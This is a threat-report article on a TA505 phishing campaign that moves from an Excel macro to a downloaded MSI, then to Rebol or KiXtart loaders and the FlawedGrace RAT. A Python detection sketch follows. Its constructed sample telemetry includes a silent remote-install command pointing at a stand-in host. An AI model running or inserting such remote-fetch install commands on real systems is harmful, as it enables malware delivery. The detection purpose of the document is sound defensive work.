Cybersecurity researchers have discovered a malicious email campaign targeting users in Germany and Austria. Security experts have linked the campaign to the TA505 cybercriminal group, whose members have used the Dridex banking Trojan and tools such as FlawedAmmyy, FlawedGrace, the Neutrino botnet and Locky ransomware in past attacks.
The attacks began as a series of small email waves, each delivering only a few thousand messages; in late September the volume spiked to hundreds of thousands of messages.
The criminals trick users into enabling macros after opening a malicious Microsoft Excel attachment. The macros then download an obfuscated MSI file that installs the next-stage downloaders, which in turn install an updated version of the FlawedGrace remote access Trojan.
FlawedGrace, first discovered in November 2017, is a fully functional C++ remote access Trojan specifically designed to hinder reverse engineering and analysis. The Trojan communicates with its C&C server to receive instructions and sends the results of those commands back to the server.
In the latest campaign the criminals changed their tactics: they now use reworked intermediate loaders such as Rebol and KiXtart instead of Get2, the loader the group previously used to perform reconnaissance and to download and install the final-stage RAT.
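The chain described above (Office macro, downloaded MSI, script-based intermediate loader, final RAT) leaves a distinctive parent-child process trail that defenders can hunt for. The following is an added detection sketch, not code from the original article or from any vendor. It assumes process-creation telemetry shaped like Sysmon Event ID 1 (fields ParentImage, Image, CommandLine); the interpreter file names for KiXtart (kix32.exe) and Rebol (rebol.exe), the Windows installer name msiexec.exe, and the sample events are assumptions or constructed values to tune for your own environment.

```python
"""Detection sketch for the Excel -> MSI -> script-loader -> RAT chain.

Added example, not from the original article or any vendor. Assumes
process-creation records with ParentImage, Image and CommandLine fields
(Sysmon Event ID 1 style). Interpreter and installer file names below
are assumptions; the sample telemetry is constructed, not from a real
incident.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Office hosts that a malicious macro would run inside (assumed names).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Windows installer binary used to install an MSI package (assumed name).
MSI_INSTALLER = "msiexec.exe"
# Interpreters for the scripting languages named in the article as
# intermediate loaders; the executable names are assumptions.
SCRIPT_LOADERS = {"kix32.exe", "rebol.exe"}
# A package argument that is a URL or UNC path means the installer fetches
# the package remotely instead of from local disk.
REMOTE_PATH = re.compile(r"(https?://|\\\\\S)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    record_id: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[Finding]:
    """Return the findings raised by one process-creation record."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    rid = event.get("RecordId", "?")
    findings: list[Finding] = []

    # Stage 1: an Office process starts the installer against a remote
    # package. Legitimate installs are rarely launched by Excel, and
    # almost never from a URL or network share.
    if parent in OFFICE_APPS and child == MSI_INSTALLER and REMOTE_PATH.search(cmd):
        findings.append(Finding("office_spawns_remote_msi", rid, cmd))

    # Stage 2: the installed package (or the Office process itself) hands
    # off to a scripting interpreter that is uncommon on workstations.
    if child in SCRIPT_LOADERS and parent in OFFICE_APPS | {MSI_INSTALLER}:
        findings.append(Finding("script_loader_from_office_or_msi", rid,
                                f"{parent} -> {child}: {cmd}"))

    return findings


def scan(events) -> list[Finding]:
    """Evaluate every record and collect all findings in order."""
    out: list[Finding] = []
    for event in events:
        out.extend(evaluate(event))
    return out


# Constructed sample telemetry (not from any real incident). Record 1 and 4
# are benign; 2 and 3 reproduce the chain described in the article.
SAMPLE_EVENTS = [
    {"RecordId": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'},
    {"RecordId": "2",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/pkg.msi /q"},
    {"RecordId": "3", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\kix32.exe",
     "CommandLine": r"kix32.exe loader.kix"},
    {"RecordId": "4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] record {finding.record_id}: {finding.detail}")
```

Running the module flags records 2 and 3 only: the Excel-launched installer pulling a package from a URL, and the installer handing off to the KiXtart interpreter. The rules key on parent-child relationships and argument shape rather than on file hashes, so they keep working when the obfuscated MSI or the loader script changes between waves; tune the interpreter and Office lists to the software actually deployed on your endpoints to keep false positives low.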